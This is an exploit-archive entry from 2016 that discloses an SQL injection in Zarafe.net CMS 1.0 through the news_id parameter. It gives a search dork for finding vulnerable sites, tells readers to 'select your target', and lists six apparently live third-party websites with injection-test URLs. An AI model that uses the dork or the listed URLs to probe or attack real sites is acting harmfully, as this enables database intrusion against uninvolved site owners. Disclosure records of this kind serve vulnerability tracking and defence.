Zarafe.net CMS 1.0 SQL Injection

2016.04.18

Credit: Iran Cyber Security Group (ICSG)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:"طراحی و پیاده سازی توسط زرافه دات نت"

Exploit Title : Zarafe.net CMS SQL Injection Vulnerability
Exploit Author : Iran Cyber Security Group (ICSG)
Discovered By : 0x3a
Vendor HomePage : www.zarrafe.net
Version : 1.0 (Q1)
Date : 4 April, 2016
Tested On : Internet Explorer , Win 98
-----------------------------------------
SQL Injection :
For Finding Target First You Must Search The Dork And Select Your Target
Dork : intext:"????? ? ????? ???? ???? ????? ??? ??"
Vulnerable Page : news.php , news_view.php , product.php
Vulnerable Variable : news_id=
Demo :
novinsystemfars.ir/news_view.php?news_id=30'
pezeshkian-pharmacy.ir/news.php?news_id=3'
sdshiraz.com/news.php?news_id=8'
omidoor.com/products.php?product_category_code=12-15'
meysam71.ir/news.php?khabar_id=10'
etehadweb.ir/view_single_news.php?news_id=2
[+][+][+][+][+][+][+]
WWW.IRAN-CYBER.NET[+]
[+][+][+][+][+][+][+]
</0x3a>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Zarafe.net CMS 1.0 SQL Injection

Dork: intext:"طراحی و پیاده سازی توسط زرافه دات نت"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.